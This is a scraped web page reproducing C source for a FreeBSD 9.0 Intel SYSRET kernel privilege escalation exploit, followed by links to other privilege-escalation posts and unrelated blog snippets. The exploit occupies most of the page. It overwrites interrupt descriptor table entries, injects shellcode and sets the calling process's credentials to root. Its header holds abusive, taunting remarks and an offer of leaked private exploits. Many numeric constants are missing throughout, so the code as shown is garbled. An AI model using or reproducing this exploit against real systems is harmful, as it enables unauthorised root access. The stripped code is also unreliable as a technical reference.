/*

 * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit

 * Author by CurcolHekerLink

 *

 * This exploit based on open source project, I can make it open source too. Right?

 *

 * If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :)

 *

 * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,

 * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam

 * if you would like next private exploit leakage, just mention @MamahhDedeh

 *

 * Some people may feel harmed when we release this exploit :))

 *

 * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))

 *

 */

#include <stdio.h>

#include <stdlib.h>

#include <stdint.h>

#include <unistd.h>

#include <string.h>

#include <sys/mman.h>

#include <machine/cpufunc.h>

#define _WANT_UCRED

#include <sys/proc.h>

#include <machine/segments.h>

#include <sys/param.h>

#include <sys/linker.h>

#define TRIGGERSIZE 20

#define BOUNCESIZE 18

uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp;

struct gate_descriptor * sidt()

{

        struct region_descriptor idt;

        asm ("sidt %0": "=m"(idt));

        return (struct gate_descriptor*)idt.rd_base;

}

u_long matchsym(char *symname)

{

        struct kld_sym_lookup ksym;

        ksym.version = sizeof (ksym);

        ksym.symname = symname;

        if (kldsym(, KLDSYM_LOOKUP, &ksym) < ) {

                perror("kldsym");

                exit();

        }

        return ksym.symvalue;

}

void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)

{

        struct gate_descriptor *ip;

        ip = idt + idx;

        ip->gd_looffset = func;

        ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);

        ip->gd_ist = ist;

        ip->gd_xx = ;

        ip->gd_type = typ;

        ip->gd_dpl = dpl;

        ip->gd_p = ;

        ip->gd_hioffset = func>>;

}

void payload()

{

        printf("[+] Woohoo!!!\n");

        exit();

}

void resetidt()

{

        struct thread *td;

        struct ucred *cred;

        struct gate_descriptor *idt = sidt();

        setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, );

        asm ("mov %%gs:0, %0" : "=r"(td));

        cred = td->td_proc->p_ucred;

        cred->cr_uid = cred->cr_ruid = cred->cr_rgid = ;

        cred->cr_groups[] = ;

        asm ("swapgs; sysretq;" :: "c"(payload));

}

void resolving()

{

        Xdivp = (uintptr_t)matchsym("Xdiv");

        Xdbgp = (uintptr_t)matchsym("Xdbg");

        Xbptp = (uintptr_t)matchsym("Xbpt");

        Xoflp = (uintptr_t)matchsym("Xofl");

        Xbndp = (uintptr_t)matchsym("Xbnd");

        Xillp = (uintptr_t)matchsym("Xill");

        Xdnap = (uintptr_t)matchsym("Xdna");

        Xfpusegmp = (uintptr_t)matchsym("Xfpusegm");

        Xtssp = (uintptr_t)matchsym("Xtss");

        Xmissingp = (uintptr_t)matchsym("Xmissing");

        Xstkp = (uintptr_t)matchsym("Xstk");

        Xprotp = (uintptr_t)matchsym("Xprot");

        Xpagep = (uintptr_t)matchsym("Xpage");

        Xfpup = (uintptr_t)matchsym("Xfpu");

        Xalignp = (uintptr_t)matchsym("Xalign");

        Xmchkp = (uintptr_t)matchsym("Xmchk");

        Xxmmp = (uintptr_t)matchsym("Xxmm");

}

void trigger()

{

        printf("[+] Crotz...\n");

        uint64_t pagesize = getpagesize();

        uint8_t * mappedarea = (uint8_t*)((1ULL << ) - pagesize);

        mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -, );

        if (mappedarea == MAP_FAILED) {

                perror("mmap (trigger)");

                exit();

        }

        char triggerpayload[] =

                "\xb8\x18\x00\x00\x00"

                "\x48\x89\xe3"

                "\x48\xbc\xef\xbe\xad\xde\xef\xbe\xad\xde"

                "\x0f\x05";

        uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;

        memcpy(offset_addr, triggerpayload, TRIGGERSIZE);

        *(uint64_t*)(offset_addr + ) = (uint64_t)(((uint8_t*)&sidt()[]) +  * );

        printf("[+] Crotz...\n");

        char bouncepayload[] =

                "\x0f\x01\xf8"

                "\x48\x89\xdc"

                "\x48\xb8\xef\xbe\xad\xde\xef\xbe\xad\xde"

                "\xff\xe0";

        uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));

        size_t bouncer_allocsize = pagesize;

        if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-)) + pagesize < bouncer + BOUNCESIZE)

                bouncer_allocsize += pagesize;

        if (mmap((void*)((uint64_t)bouncer & ~(pagesize-)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -, ) == MAP_FAILED)

        {

                perror("mmap (bouncer)");

                exit();

        }

        memcpy(bouncer, bouncepayload, BOUNCESIZE);

        *(uint64_t*)(bouncer + ) = (uint64_t)resetidt;

        ((void (*)())offset_addr)();

}

int main(int argc, char *argv[])

{

        printf("[+] SYSRET FUCKUP!!\n");

        printf("[+] Start Engine...\n");

        resolving();

        printf("[+] Crotz...\n");

        trigger();

        return ;

}

FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit的更多相关文章

  1. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  2. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  3. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  4. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  5. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  6. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  7. [EXP]Memu Play 6.0.7 - Privilege Escalation

    # Exploit Title: Memu Play - Privilege Escalation (PoC) # Date: // # Author: Alejandra Sánchez # Ven ...

  8. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  9. Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86)

    /****************************************************************************** * .:: Impel Down ::. ...

随机推荐

  1. for循环,pydev提示未使用的变量,解决办法

    对于如下代码,pvdev会产生未使用变量的警告 for i in range(5): func() 解决办法: 把变量替换成下划线_,就不会生产告警了.改变后如下: for _ in range(5) ...

  2. 利用FFmpeg生成视频缩略图 2.3.1

    1.下载FFmpeg文件包,解压包里的\bin\下的文件解压到 D:\ffmpeg\ 目录下. 下载地址 http://ffmpeg.zeranoe.com/builds/win32/static/ ...

  3. codeforces B.Fence 解题报告

    题目链接:http://codeforces.com/problemset/problem/363/B 题目意思:给定整数n和k,需要从n个数中找出连续的k个数之和最小,输出这连续的k个数中的第一个数 ...

  4. HDU 5724 Chess (状态压缩sg函数博弈) 2016杭电多校联合第一场

    题目:传送门. 题意:有n行,每行最多20个棋子,对于一个棋子来说,如果他右面没有棋子,可以移动到他右面:如果有棋子,就跳过这些棋子移动到后面的空格,不能移动的人输. 题解:状态压缩博弈,对于一行2^ ...

  5. glut编译问题 (程序无法运行)

    参考:http://blog.csdn.net/robinjwong/article/details/5636049 error: the procedure entry point _glutini ...

  6. 埃及分数(codevs 1288)

    题目描述 Description 在古埃及,人们使用单位分数的和(形如1/a的, a是自然数)表示一切有理数. 如:2/3=1/2+1/6,但不允许2/3=1/3+1/3,因为加数中有相同的. 对于一 ...

  7. Session入门

    Session是运行在服务器的,不可造假,例如:医生需要一个私人账本,记录病人编号和身份的对应关系.由于身份证无法造假,所以能够保证信息不被假冒.两点:身份证无法造假,这个身份证就可以唯一标识这个用户 ...

  8. OpenStack Swift集群与Keystone的整合使用说明

    之前已经介绍了OpenStack Swift集群和Keystone的安装部署,最后来讲一讲Swift集群与Keystone的整合使用吧. 1. 简介 本文档描述了Keystone与Swift集群的整合 ...

  9. thinkphp的mvc理解

    ThinkPHP支持多层设计. .模型层Model 使用多层目录结构和命名规范来设计多层的model,例如在项目设计中如果需要区分数据层,逻辑层,服务层等不同的模型层可以在模块目录下创建Model,L ...

  10. 电赛菜鸟营培训(三)——STM32F103CB之串口通信

    一.串口通信概念 1.缩写 USART:Universal Synchronous/Asynchronous Receiver/Transmitter 通用同步/异步接收和发送器 2.用处 (1)同步 ...